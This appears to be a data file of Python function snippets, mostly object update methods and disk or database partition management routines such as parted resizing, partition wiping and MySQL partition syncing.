"def expand_second_partition(device):\n\n print('Deleting the original boot partition from the thumb drive')\n _delete_partition(device, 1)\n\n print('Expanding the partition. Resizing isn\\'t worth it. Or obvious to do.')\n resize_command = ['sudo', 'parted', device.path, 'resizepart', '2', '\"-1s\"']\n interactive_console(resize_command)\n\n print('Fixing the nibbly bits for the partition itself')\n target_partition = device.partitions(full_paths=True)[0]\n interactive_console(['sudo', 'e2fsck', '-f', target_partition])\n\n print('Fixing ext4 so it goes all the way to the end')\n target_end = device.partition_specs(2)['End']\n interactive_console(['sudo', 'resize2fs', target_partition, target_end])\n\n print('Success!')",
"def _wipe(self):\n log_method_call(self, self.name, status=self.status)\n\n start = self.partedPartition.geometry.start\n part_len = self.partedPartition.geometry.end - start\n bs = self.partedPartition.geometry.device.sectorSize\n device = self.partedPartition.geometry.device.path\n\n # Erase 1MiB or to end of partition\n count = int(Size(\"1 MiB\") / bs)\n count = min(count, part_len)\n\n cmd = [\"dd\", \"if=/dev/zero\", \"of=%s\" % device, \"bs=%s\" % bs,\n \"seek=%s\" % start, \"count=%s\" % count]\n try:\n util.run_program(cmd)\n except OSError as e:\n log.error(str(e))\n finally:\n # If a udev device is created with the watch option, then\n # a change uevent is synthesized and we need to wait for\n # things to settle.\n udev.settle()",
"def set_partition(self, partition=0):\n if not isinstance(partition, int):\n raise TypeError('partition must be an integer')\n if partition <= 0:\n raise ValueError('partition must be positive')\n if self.connected:\n self.producer.send(\"PART:\"+str(partition))",
"def perform_swap(self, replica_i, replica_j):\n param_i = replica_i.parameter\n replica_i.parameter = replica_j.parameter\n replica_j.parameter = param_i",
"def update_device(self, dev_dict):\n # Note(jprabh1x): added bus,slot,function into fields dict as \n # seperate fields.\n no_changes = ('status', 'instance_uuid', 'id', 'extra_info', 'workload')\n map(lambda x: dev_dict.pop(x, None),\n [key for key in no_changes])\n\n # Note(jprabh1x): populating values for bus,slot,function from address in dev_dict.\n if dev_dict.has_key(\"address\"):\n \t\taddress = pci_utils.parse_address(dev_dict[\"address\"])\n \t\tdev_dict.update({'bus':str(address[1]), 'slot':str(address[2]), 'function':str(address[3])})\n for k, v in dev_dict.items():\n if k in self.fields.keys():\n self[k] = v\n else:\n extra_info = self.extra_info\n extra_info.update({k: str(v)})\n self.extra_info = extra_info",
"def update(self, other):\n _merge_dicts(self, other)",
"def on_edit_clicked(self,button):\n\t\tself.list_partitions.edit_partition()",
"def perform_update(self, serializer):\n extra_data = self.get_additional_data(False)\n serializer.save(**extra_data)",
"def update(self, xnew, ynew):\n # define old snapshots to be discarded\n xold, yold = self.Xw[:,0], self.Yw[:,0]\n # Update recent w snapshots\n self.Xw = np.column_stack((self.Xw[:,1:], xnew))\n self.Yw = np.column_stack((self.Yw[:,1:], ynew))\n \n # direct rank-2 update\n # define matrices\n U, V = np.column_stack((xold, xnew)), np.column_stack((yold, ynew))\n C = np.diag([-(self.weighting)**(self.w),1])\n # compute PkU matrix matrix product beforehand\n PkU = self.P.dot(U)\n # compute AkU matrix matrix product beforehand\n AkU = self.A.dot(U)\n # compute Gamma\n Gamma = np.linalg.inv(np.linalg.inv(C)+U.T.dot(PkU))\n # update A\n self.A += (V-AkU).dot(Gamma).dot(PkU.T)\n # update P\n self.P = (self.P - PkU.dot(Gamma).dot(PkU.T))/self.weighting\n # ensure P is SPD by taking its symmetric part\n self.P = (self.P + self.P.T)/2\n \n # time step + 1\n self.timestep += 1",
"def addPartition(self,partitionData):\n self.PCAs[partitionData.id] = partitionData\n self.pcaStatemachineLock[partitionData.id] = threading.Lock()\n self.StateMachineForPca[partitionData.id] = Statemachine(self.StateMachineFile,\"Unconfigured\")\n self.isPCAinTransition[partitionData.id] = False\n self.pcaSequenceNumber[partitionData.id] = 0",
"def update_inplace_from(self, other):\n self.__dict__ = other.__dict__.copy()",
"def _deploy_athena_partition_refresh():\n athena_package = AthenaPackage(config=config, version=current_version)\n athena_package.create_and_upload()\n return athena_package",
"def hard_update(target, source):\n for target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(param.data)",
"def update(self, other):\n for name, value in other.items():\n self.__setitem__(name, value)",
"def update(self, other):\n fields = None\n if isinstance(other, dict):\n fields = other\n elif isinstance(other, Torrent):\n fields = other.fields\n else:\n raise ValueError('Cannot update with supplied data')\n for k, v in fields.iteritems():\n self.fields[k.replace('-', '_')] = v",
"def update(self, idx: int, new_priority: T.Union[int, float]):\n old_priority, item = self.__heap[idx]\n self.__heap[idx] = (new_priority, item)\n\n if new_priority < old_priority:\n self.__sift_up(idx)\n else:\n self.__sift_down(idx)",
"def update(self,\n tier1_id,\n segment_id,\n port_id,\n segment_port,\n ):\n return self._invoke('update',\n {\n 'tier1_id': tier1_id,\n 'segment_id': segment_id,\n 'port_id': port_id,\n 'segment_port': segment_port,\n })",
"def update(self):\n with managed_session() as session:\n session.merge(self)",
"def update(self):\n if self._skip_update:\n self._skip_update = False\n return\n\n try:\n for prop in AIRER_PROPS:\n self.status[prop] = self.send('get_prop', [prop])[0]\n _LOGGER.debug(\"MiioDevice update: %s\", self.status)\n self.available = True\n self._retry = 0\n except Exception as exc:\n _LOGGER.error(\"Error on update: %s\", exc)\n self._retry += 1\n if self._retry > 3:\n self.available = False\n\n for entity in self.update_entities:\n entity.async_schedule_update_ha_state()",
"def merge_from(self, other):\n assert not self.is_final\n if self.parent is not None:\n assert other.parent is not None\n self.parent.merge_from(other.parent)\n self.isolated_names.update(other.isolated_names)\n self.read.update(other.read)\n self.modified.update(other.modified)\n self.bound.update(other.bound)\n self.deleted.update(other.deleted)\n self.annotations.update(other.annotations)\n self.params.update(other.params)",
"def partition_book(self):\n ...",
"def test_partially_update_device_by_id1(self):\n pass",
"def partitions_updater(self, user):\n for partition in ['boot_id', 'root_id', 'swap_id']:\n if (partition in user) and \\\n (user[partition] in self.system['partitions']):\n self.system['partitions'].remove(user[partition])\n\n return self.system['partitions']",
"def update(self, instance, validated_data):\n\n # If an order is cancelled or delivered, it cannot be modified.\n if instance.status == CANCELLED or instance.status == DELIVERED:\n raise exceptions.PermissionDenied('This order cannot be modified.')\n\n # If an order is already confirmed but UI/agent sends another confirmation request by mistake,\n # we deny it as each confirmation is a big operation that includes generating invoices/ledger entries.\n if instance.status == validated_data['status'] == CONFIRMED:\n raise exceptions.PermissionDenied('This order is already confirmed.')\n\n if instance.status == ACCEPTED and validated_data['status'] == CONFIRMED:\n # 1. Transition: accepted -> confirmed\n instance.status = validated_data.get('status')\n elif instance.status == CONFIRMED and validated_data['status'] in [CANCELLED, DELIVERED]:\n # 2. Transition: confirmed -> cancelled/delivered and return\n instance.status = validated_data.get('status')\n instance.save(update_fields=['status'])\n return instance\n else:\n # In case of any invalid transition, reject it.\n raise exceptions.PermissionDenied('There seems to be some discrepancy. Please contact your agent.')\n\n # Get exclusive lock on all relevant data rows\n orderlines = instance.orderlines.select_for_update().select_related('product').all()\n\n # Do order and product update in a single transaction\n with transaction.atomic():\n\n # Validate that order can be approved.\n self._validate_units_and_balance_in_orderlines(orderlines, instance.user)\n\n for orderline in orderlines:\n\n # Decrement product stock count by orderline(buying) requirement\n product = orderline.product\n product.units = F('units') - orderline.units\n product.save(update_fields=['units'])\n\n # Lock current standing price into the orderline, calculate sub total and lock it.\n product_price = product.price\n orderline.confirmed_price = product_price\n orderline.locked = CONFIRMED\n orderline.sub_total = product_price * F('units')\n orderline.save(update_fields=['confirmed_price', 'locked', 'sub_total'])\n\n # Mark order as confirmed.\n instance.save(update_fields=['status'])\n return instance",
"def newpart(self, device, primary, ncyls, swap=False):\n # This is a simple partitioning tool, which only supports\n # adding partitions sequentially, with all primary partitions\n # being before the extended partition, so once a logical\n # partition has been added, it is not possible to add further\n # primary ones.\n di = DiskInfo(device)\n pmax = 0 # Record highest partition number\n lim = -1 # Used for seeking last used cylinder\n exp = 0 # Number of extended partition\n ex0, ex1 = 0, -1 # Extended partition start and end\n log0, log1 = 0, -1 # Start and end of area used by logical partitions\n for p in di.parts:\n pn = int(p[0][len(device):])\n scyl, ecyl = p[1:3]\n if pn <= 4:\n if exp:\n run_error(_(\"Not supported: primary partition (%s%d)\\n\"\n \"has higher partition number than extended \"\n \"partition\") % (device, pn))\n return \"\"\n if scyl <= lim:\n run_error(_(\"Partitions must be ordered on the device.\\n\"\n \"%s%d is out of order.\") % (device, pn))\n return \"\"\n if p[3] in (\"5\", \"f\"):\n # extended\n exp = pn\n ex0, ex1 = scyl, ecyl\n continue\n pmax = pn\n lim = ecyl\n\n startcyl = lim + 1\n endcyl = lim + ncyls\n if endcyl >= di.drvcyls:\n run_error(_(\"Too little space at end of drive for new partition\"))\n return \"\"\n if exp and (pmax <= 4):\n # Remove the extended partition, which is empty anyway\n if not self.rmpart(device, exp):\n return \"\"\n pmax = exp - 1\n if primary:\n if pmax >= 4:\n run_error(_(\"Cannot add primary partition to %s\") % device)\n return \"\"\n t = \"primary\"\n else:\n t = \"logical\"\n if pmax > 4:\n # resize extended partition\n if not self.xcheck(\"resizepart\", device, str(exp),\n str(ex0), str(endcyl),\n onfail=_(\"Couldn't resize extended partition %s%d\")\n % (device, exp)):\n return False\n else:\n # create extended partition\n if not self.xcheck(\"newpart\", device,\n str(startcyl), str(endcyl), \"extended\",\n onfail=_(\"Couldn't create extended partition on %s\")\n % device):\n return False\n if pmax < 4:\n pmax = 4\n\n if self.xcheck(\"newpart\", device, str(startcyl), str(endcyl),\n t, \"linux-swap\" if swap else \"ext2\"):\n return \"%s%d\" % (device, pmax + 1)\n else:\n run_error(_(\"Couldn't add new partition to %s\") % device)\n return \"\"",
"def update(self, other):\n\n fields = None\n if isinstance(other, dict):\n fields = other\n elif isinstance(other, Session):\n fields = other.fields\n else:\n raise ValueError('Cannot update with supplied data')\n\n for k, v in fields.iteritems():\n self.fields[k.replace('-', '_')] = v",
"def update(self, **values):\r\n if self.__abstract__:\r\n raise ThunderdomeException('cant update abstract elements')\r\n self.pre_update(**values)\r\n for key in values.keys():\r\n if key not in self._columns:\r\n raise TypeError(\"unrecognized attribute name: '{}'\".format(key))\r\n\r\n for k,v in values.items():\r\n setattr(self, k, v)\r\n\r\n return self.save()",
"def partition_session(self):\n if self.user['drive']['name'] is not None:\n\n # Set root size\n if self.user['root_freespace'] is True:\n self.user['root_size'] = 'freespace'\n\n # Set partition parameters\n self.user['partitions'] = {'name': ['boot', 'root'],\n 'size': [self.user['boot_size'],\n self.user['root_size']],\n 'filesystem': ['fat32', 'ext4'],\n 'mountpoint': ['/mnt/boot', '/mnt'],\n 'mountorder': [1, 0]}\n\n # Set swap size and filesystem\n if 'Swap' in self.user['optional_partitions']:\n self.user['partitions']['size'].insert(1, self.user['swap_size'])\n self.user['partitions']['filesystem'].insert(1, 'swap')\n\n # Set home size and filesystem\n if 'Home' in self.user['optional_partitions']:\n if self.user['home_freespace'] is True:\n self.user['home_size'] = 'freespace'\n self.user['partitions']['size'].append(self.user['home_size'])\n self.user['partitions']['filesystem'].append('ext4')\n\n # Custom partitions\n else:\n\n # Set partition parameters\n self.user['partitions'] = {\n 'name': ['boot', 'root'],\n 'drive_id': [self.user['boot_id'].split()[0],\n self.user['root_id'].split()[0]],\n 'mountpoint': ['/mnt/boot', '/mnt'],\n 'mountorder': [1, 0]}\n\n # Set swap drive ID\n if self.user['swap_id'] is not None:\n self.user['partitions']['drive_id'].insert(\n 1, self.user['swap_id'].split()[0])\n\n # Set home drive ID\n if self.user['home_id'] is not None:\n self.user['partitions']['drive_id'].append(\n self.user['home_id'].split()[0])\n\n # Set swap parameters\n if ('Swap' in self.user['optional_partitions']) or \\\n (self.user['swap_id'] is not None):\n self.user['partitions']['name'].insert(1, 'swap')\n self.user['partitions']['mountpoint'].insert(1, 'swap')\n self.user['partitions']['mountorder'].insert(1, 2)\n\n # Set home parameters\n if 'Home' in self.user['optional_partitions'] or \\\n (self.user['home_id'] is not None):\n self.user['partitions']['name'].append('home')\n self.user['partitions']['mountpoint'].append('/mnt/home')\n self.user['partitions']['mountorder'].append(3)",
"def FormatPartition(self, partition):\n\n fstab = self.fstab\n if fstab:\n p = fstab[partition]\n self.script.append('format(\"%s\", \"%s\", %s, \"%s\", \"%s\");' %\n (p.fs_type, common.PARTITION_TYPES[p.fs_type],\n self._GetSlotSuffixDeviceForEntry(p),\n p.length, p.mount_point))",
"def save_partition(self, partition):\n raise NotImplementedError('save_file')",
"def sync_table_partitions(self) -> None:\n log.info(\"== Stage 5.1: Check table partitions are up-to-date ==\")\n\n # we're using partitions in the ddl file, skip syncing anything\n if not self.rm_partition:\n return\n # not a partitioned table, nothing to do\n if not self.partitions:\n return\n\n # only apply this logic to RANGE partitioning, as other types\n # are usually static\n partition_method = self.get_partition_method(\n self._current_db, self.new_table_name\n )\n if partition_method != \"RANGE\":\n return\n\n try:\n new_tbl_parts = self.list_partition_names(self.new_table_name)\n orig_tbl_parts = self.list_partition_names(self.table_name)\n\n parts_to_drop = set(new_tbl_parts) - set(orig_tbl_parts)\n parts_to_add = set(orig_tbl_parts) - set(new_tbl_parts)\n\n # information schema literally has the string None for\n # non-partitioned tables. Previous checks *should* prevent us\n # from hitting this.\n if \"None\" in parts_to_add or \"None\" in parts_to_drop:\n log.warning(\n \"MySQL claims either %s or %s are not partitioned\",\n self.new_table_name,\n self.table_name,\n )\n return\n\n if parts_to_drop:\n log.info(\n \"Partitions missing from source table \"\n \"to drop from new table %s: %s\",\n self.new_table_name,\n \", \".join(parts_to_drop),\n )\n if parts_to_add:\n log.info(\n \"Partitions in source table to add to new table %s: %s\",\n self.new_table_name,\n \", \".join(parts_to_add),\n )\n self.apply_partition_differences(parts_to_drop, parts_to_add)\n except Exception:\n log.exception(\n \"Unable to sync new table %s with orig table %s partitions\",\n self.new_table_name,\n self.table_name,\n )",
"def update_orderbook(self, existing_orderbook_obj, instrument, market_place, market_segment, market_capability, \\\n tick_size_list, round_lot, day_count, orderbook_name, tiering_level, orderbook_curr=None):\n logger.DLOG(\"Updating orderbook...\") \n clone_obj = existing_orderbook_obj.Clone()\n clone_obj.Instrument = instrument\n if orderbook_curr:\n clone_obj.Currency = orderbook_curr\n else:\n clone_obj.Currency = instrument.Currency()\n clone_obj.Quotation = instrument.Quotation()\n clone_obj.MarketPlace = market_place\n clone_obj.RoundLot = self.get_round_lot(instrument, round_lot)\n #clone_obj.PhysicalMarketSegment(market_segment)\n clone_obj.Name = orderbook_name\n clone_obj.QuoteFactor = 1\n clone_obj.TickSizeList = self.get_tick_size_list(tick_size_list, market_capability)\n if str(tiering_level):\n clone_obj.ExternalType = tiering_level\n clone_obj.ExternalId = orderbook_name\n\n try: \n existing_orderbook_obj.Apply(clone_obj)\n existing_orderbook_obj.Commit() \n \n #group_map = self.get_list_leaf(clone_obj,market_segment) \n #if group_map and clone_obj.GroupMaps().IndexOf(group_map) <0 :\n # clone_obj.GroupMaps().Add(group_map) \n # clone_obj.GroupMaps().Commit() \n \n logger.LOG(\"**Successfully** updated orderbook information: <%s> for instrument <%s>\"%(orderbook_name, instrument.Name()))\n except Exception as e:\n logger.ELOG('**Error** while updating OrderBook %s : %s'%(orderbook_name, e))",
"def update(self, key, node, local_edges, foreign_edges, transaction_id):\n assert self.row_exists(key, transaction_id), \"Key does not exist\"\n\n last_node = self.rows[key][-1]\n node = last_node.copy(node, local_edges, foreign_edges, transaction_id)\n self._create_or_update_row(key, node)",
"def update(self, initial, follows):",
"def update(self):\n self._g, self._B = self._constraint_assembler.preallocate_g_and_B(self._no_of_dofs_unconstrained,\n self._dofidxs(),\n self._no_of_constraints_by_object())",
"def partitionname(self, partitionname) :\n\t\ttry :\n\t\t\tself._partitionname = partitionname\n\t\texcept Exception as e:\n\t\t\traise e",
"def _update(self, datapoints):\r\n if len(datapoints) == 1:\r\n timestamp, value = datapoints[0]\r\n whisper.update(self.path, value, timestamp)\r\n else:\r\n whisper.update_many(self.path, datapoints)",
"def update_attr(self):\n\n # Retrieve all current values\n all_values = nx.get_node_attributes(self.G, 'value')\n\n new_values = {}\n\n # Loop over all nodes\n for i in range(self.n_v):\n\n # Obtain list of neighbors\n neighbors = list(nx.all_neighbors(self.G, i))\n\n # Compute part dependent on own node\n val_i = all_values[i]\n new_value = (1 - self.eps) * (1 - self.a * val_i * val_i)\n\n # Compute part dependent on neighbor nodes\n neighbors_value = 0\n for neighbor in neighbors:\n val_n = all_values[neighbor]\n neighbors_value += (1 - self.a * val_n * val_n)\n\n # Catch nodes without neighbors\n try:\n new_value += neighbors_value * (self.eps/len(neighbors))\n except ZeroDivisionError:\n pass\n\n # Save new value\n new_values[i] = {'value': new_value}\n\n nx.set_node_attributes(self.G, new_values)",
"def update(self, instance, validated_data):\n instance.product_name = validated_data.get('product_name', instance.product_name)\n instance.product_mrp = validated_data.get('product_mrp', instance.product_mrp)\n instance.save()\n return instance",
"def update(self, dbase):\n dbase.updateVirtualSpace(\n self.__id,\n self.__name,\n self.__host,\n self.__size\n )",
"def testUpdate(self):\n try:\n provU = ProvenanceProvider(self.__cfgOb, self.__cachePath, useCache=False)\n pD = {self.__provKeyName: self.__provInfoL}\n ok = provU.store(pD)\n self.assertTrue(ok)\n #\n ok = provU.update(pD)\n self.assertTrue(ok)\n #\n fD = provU.fetch()\n self.assertTrue(self.__provKeyName in fD)\n self.assertDictEqual(pD, fD)\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()",
"def update(self):\n\n raise NotImplementedError('Must be implemented by subclasses')",
"def close(self, **kwargs):\n config = getattr(self, \"config\", None)\n\n if config is None:\n return\n\n if kwargs:\n config.update(kwargs)\n\n original = getattr(self, \"_original\", None)\n logger.partitioning(\"Partition.close: original = {}\".format(original))\n\n if not original:\n originally_on_disk = False\n original_subarray = None\n else:\n originally_on_disk = not original.in_memory\n original_subarray = original._subarray\n\n config = self.config\n logger.partitioning(\" config = {}\".format(config))\n\n if config[\"serial\"]:\n # --------------------------------------------------------\n # SERIAL\n # --------------------------------------------------------\n logger.partitioning(\" serial\")\n\n if config[\"readonly\"]:\n logger.partitioning(\" readonly=True\")\n\n if originally_on_disk:\n logger.partitioning(\" subarray originally on disk\")\n\n if config.get(\"to_disk\", False):\n # 1.1.1.1 The original subarray was on disk,\n # we don't want to keep the current\n # subarray in memory, and we are happy\n # to discard any changes that may have\n # been made to the subarray.\n logger.partitioning(\" 1.1.1.1 revert\")\n self.revert()\n elif free_memory() <= cf_fm_threshold():\n # 1.1.1.2 The original subarray was on disk,\n # we are happy to keep the current\n # subarray in memory, but there is not\n # enough free memory to do so.\n logger.partitioning(\n \" 1.1.1.2 revert ({} <= {})\".format(\n free_memory(), cf_fm_threshold()\n )\n )\n self.revert()\n else:\n # 1.1.1.3 The original subarray was on disk\n # and there is enough memory to keep\n # the current subarray in memory\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # The original subarray was a temporary\n # file which is not referenced by any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n del self.masked\n logger.partitioning(\n \" 1.1.1.3 del masked ({} > {})\".format(\n free_memory(), cf_fm_threshold()\n )\n )\n\n else:\n logger.partitioning(\" subarray originally in memory\")\n if config.get(\"to_disk\", False):\n # 1.1.2.1 Original subarray was in memory and\n # we don't want to keep the current\n # subarray in memory\n logger.partitioning(\" 1.1.2.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.1.2.2 Original subarray was in memory and\n # unique but there is not enough\n # memory to keep the current subarray\n logger.partitioning(\" 1.1.2.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.1.2.3 Original subarray was in memory and\n # unique and there is enough memory to\n # keep the current subarray in memory\n logger.partitioning(\" 1.1.2.3 pass\")\n pass\n else:\n # config['readonly'] is False\n if originally_on_disk:\n if config.get(\"to_disk\", False):\n # 1.2.1.1 Original subarray was on disk and\n # there and we don't want to keep the\n # array\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # Original subarray was a temporary file\n # on disk which is not referenced by any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n logger.partitioning(\" 1.2.1.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.2.1.2 Original subarray was on disk but\n # there is not enough memory to keep\n # it\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # Original subarray was a temporary file\n # on disk which is not referenced by any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n logger.partitioning(\" 1.2.1.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.2.1.3 Original subarray was on disk and\n # there is enough memory to keep it\n logger.partitioning(\" 1.2.1.3 pass\")\n del self.masked\n else:\n if config.get(\"to_disk\", False):\n # 1.2.2.1 Original subarray was in memory but\n # we don't want to keep it\n logger.partitioning(\" 1.2.2.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.2.2.2 Original subarray was an in memory\n # but there is not enough memory to\n # keep it\n logger.partitioning(\" 1.2.2.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.2.2.3 Original subarray was in memory and\n # there is enough memory to keep it\n logger.partitioning(\" 1.2.2.3 del masked\")\n del self.masked\n else:\n logger.partitioning(\"Partition.close: parallel\")\n # --------------------------------------------------------\n # PARALLEL\n # --------------------------------------------------------\n pass\n\n # if hasattr(self, '_original'):\n # del self._original\n\n # print(hasattr(self, 'config')),\n try:\n del self.config\n except AttributeError:\n pass",
"def before_update(mapper, conn, target):\n if not target.id_:\n dataset = ObjectNumber.parse(target.d_id)\n target.id_ = str(PartitionNumber(dataset, target.sequence_id))",
"def provision(self, orig_name, new_name, mesh_role):\n self.clear_list()\n self.read_bootinfo(orig_name)\n self.copy_prov(orig_name)\n self.ap_prov(new_name, mesh_role)\n self.ap_reprovision(orig_name)",
"def update(self, other: dict):\n for key in other:\n if key in self:\n self[key] = other[key]",
"def _update(self, other):\n # NOTE: detail map properties should NEVER be overridden. NEVER. EVER. kthx.\n if other.use_alpha:\n self.use_alpha = True\n if other.mipmap:\n self.mipmap = True",
"def update_dict(new,old):",
"def partition(attrs, df, partitions):\n if attrs in partitions:\n return partitions[attrs]\n shape = df.drop_duplicates(attrs).shape[0]\n partitions[attrs] = shape\n return shape",
"def update_attr_par(self):\n\n # Retrieve all current values\n self.all_values_temp = nx.get_node_attributes(self.G, 'value')\n\n # Calculate all new values\n new_values_list = Parallel(n_jobs=2)(delayed(self.single_node_update)(i) \\\n for i in range(self.n_v))\n\n # # Set list to dict as needed for node update\n # new_values_dict = {}\n # for i, value in enumerate(new_values_list):\n # new_values_dict[i] = {'value': value}\n #\n # # Update node value\n # nx.set_node_attributes(self.G, new_values_dict)",
"def _pd_update(pd, fields):\n pd.name = fields['name']\n pd.price = fields['price']\n pd.quantity_per_package = fields['quantity_per_package']\n pd.unit = fields['unit']\n pd.quantity_limit = fields['quantity_limit']\n pd.unit_weight = fields['unit_weight']\n pd.quantum = fields['quantum']",
"async def update_derived_data(self, pair):\n\n await self.update_adjusted_tick_data(pair)\n await self.update_mas(pair)\n await self.update_emas(pair)\n await self.filter_mas(pair)\n await self.filter_emas(pair)\n await self.update_bbands(pair)\n await self.refresh_indicators(pair)",
"def update_one_node_from_pbs_data(node, attr_dict):\n # put node under a subcluster if it does not have any yet\n if not node.subcluster:\n for id,node_regexp in SubCluster.objects.filter(server=node.server).values_list('id','node_regexp'):\n if re.match(node_regexp,node.name):\n node.subcluster_id = id\n node.save()\n break\n # fill node's np if it is not present\n if not node.np:\n node.np = attr_dict['np']\n node.save()\n\n new_states = []\n if attr_dict.has_key('state'):\n# node.state.clear()\n for statename in attr_dict['state'].split(','):\n #node.state.add(NodeState.objects.get(name=statename.strip()))\n new_states.append(NodeState.objects.get(name=statename.strip()))\n attr_dict['state'] = new_states\n\n\n new_properties = []\n if attr_dict.has_key('properties'):\n# node.properties.clear()\n for propertyname in attr_dict['properties'].split(','):\n np,created = NodeProperty.objects.get_or_create(name=propertyname.strip())\n if created:\n print(\"New property created: %s\" % propertyname)\n new_properties.append(np)\n# node.properties.add(np)\n attr_dict['properties'] = new_properties\n\n new_jobs = []\n if attr_dict.has_key('jobs'):\n slot_jobs = dict([tuple(j.strip().split('/')) for j in attr_dict['jobs'].split(',')])\n for slotstr, longjobid in slot_jobs.items():\n slot = int(slotstr)\n# js,created = getJobSlot(slot=slot,node=node)\n# if created:\n# logging.info(\"new jobslot will be created: slot: %d, node name: %s\" % (slot,name))\n jobid = int(longjobid.split('.')[0])\n new_jobs.append(jobid)\n \n# js.livejob,created = LiveJob.objects.get_or_create(jobid=jobid, server=node.server)\n# if created:\n# logging.info(\"new livejob created: %d\" % jobid)\n# js.save()\n attr_dict['jobs'] = new_jobs\n return attr_dict",
"def update_item(self, descriptor, user_id, allow_not_found=False, force=False, **kwargs): # lint-amnesty, pylint: disable=arguments-differ\n partitioned_fields = self.partition_xblock_fields_by_scope(descriptor)\n return self._update_item_from_fields(\n user_id, descriptor.location.course_key, BlockKey.from_usage_key(descriptor.location),\n partitioned_fields, descriptor.definition_locator, allow_not_found, force, **kwargs\n ) or descriptor",
"def update(self):\n self.__execute(self.pkgin_bin, \"update\")",
"def copy(self):\n new = Partition.__new__(Partition)\n new.__dict__ = self.__dict__.copy()\n\n self._increment_file_counter()\n\n return new",
"def _update(self, context, values, prune_stats=False):\n return db.compute_node_update(context, self.compute_node['id'],\n values, prune_stats)",
"def update(self):\n raise NotImplementedError",
"def update(self, other):\n if self.active:\n self.active.functor.update(other)",
"def partition_key(self, partition_key):\n\n self._partition_key = partition_key",
"def free(self,partition,runinfo_dp):\n if self.load():\n res = Online.PVSS.StringVector()\n dpv = Online.PVSS.DataPointVector()\n for i in xrange(len(self.inUse.data)):\n n = self.subfarms.data[i]\n f = self.inUse.data[i]\n if f==partition:\n res.push_back('')\n dpv.push_back(self.dp2(self.name+'_'+n,'UsedBy'))\n dpv.back().data = ''\n dpv.push_back(self.dp2(self.name+'_'+n,'RunInfo'))\n dpv.back().data = ''\n dpv.push_back(self.dp2(self.name+'_'+n,'Activity'))\n dpv.back().data = ''\n else:\n res.push_back(f)\n if len(runinfo_dp)>0:\n #dpv.push_back(self.dp2(runinfo_dp,'general.partName'))\n #dpv.back().data = ''\n #dpv.push_back(self.dp2(runinfo_dp,'HLTFarm.nSubFarms'))\n #dpv.back().data = 0\n dpv.push_back(self.dp2(runinfo_dp,'HLTFarm.subFarms'))\n dpv.back().data = Online.PVSS.StringVector()\n self.inUse.data = res\n self.writer.add(dpv)\n self.writer.add(self.inUse)\n if self.writer.execute():\n return 'SUCCESS'\n return self.error('Failed to update deallocation information for partition '+\\\n partition+' in farm system:'+self.name)\n return self.error('Failed to load information for partition '+partition+\\\n ' in farm system:'+self.name)",
"def update(self):\n diff = self._diff()\n if not diff:\n # Nothing to do!\n return\n self.parent.update_node(self, diff)",
"def update(self, other={}, **kwargs):\n joined = dict(other, **kwargs)\n\n # Update with the new set of k:v pairs,\n # but delete existing keys which are being assigned the value of None\n for k, v in joined.items():\n if v is None:\n if k in self:\n del self[k]\n else:\n self[k] = v",
"def test_update_values(self):\r\n partition = uuid4()\r\n for i in range(5):\r\n TestQueryUpdateModel.create(partition=partition, cluster=i, count=i, text=str(i))\r\n\r\n # sanity check\r\n for i, row in enumerate(TestQueryUpdateModel.objects(partition=partition)):\r\n assert row.cluster == i\r\n assert row.count == i\r\n assert row.text == str(i)\r\n\r\n # perform update\r\n TestQueryUpdateModel.objects(partition=partition, cluster=3).update(count=6)\r\n\r\n for i, row in enumerate(TestQueryUpdateModel.objects(partition=partition)):\r\n assert row.cluster == i\r\n assert row.count == (6 if i == 3 else i)\r\n assert row.text == str(i)",
"def refresh(self, context=None):\n current = self.__class__.get_by_uuid(self._context,\n cluster=self.cluster_id,\n uuid=self.uuid)\n for field in self.fields:\n if self.obj_attr_is_set(field) and self[field] != current[field]:\n self[field] = current[field]",
"def _update(self, priority, key):\n i = self._index[key]\n item = self._heap[i]\n old_priority = item.priority\n item.priority = priority\n if priority < old_priority:\n self._sift_up(i)\n else:\n self._sift_down(i)",
"def update_prim_properties(self, prim_properties):\n\n _object = self.get_object_from_store(FullID = prim_properties['FullID'])\n\n if _object == None:\n #if self.settings.LOG_VERBOSE and self.settings.ENABLE_OBJECT_LOGGING: logger.debug(\"Creating a new object and storing it's attributes. LocalID = %s\" % (object_properties['LocalID']))\n _object = Object()\n _object._update_properties(prim_properties)\n self.store_object(_object)\n else:\n #if self.settings.LOG_VERBOSE and self.settings.ENABLE_OBJECT_LOGGING: logger.debug(\"Updating an object's attributes. LocalID = %s\" % (object_properties['LocalID']))\n _object._update_properties(prim_properties)\n if _object.UpdateFlags & 2 != 0 and self.agent != None:\n \n self.agent.events_handler.handle(AppEvent(\"ObjectSelected\",\n payload = {'object':_object}))",
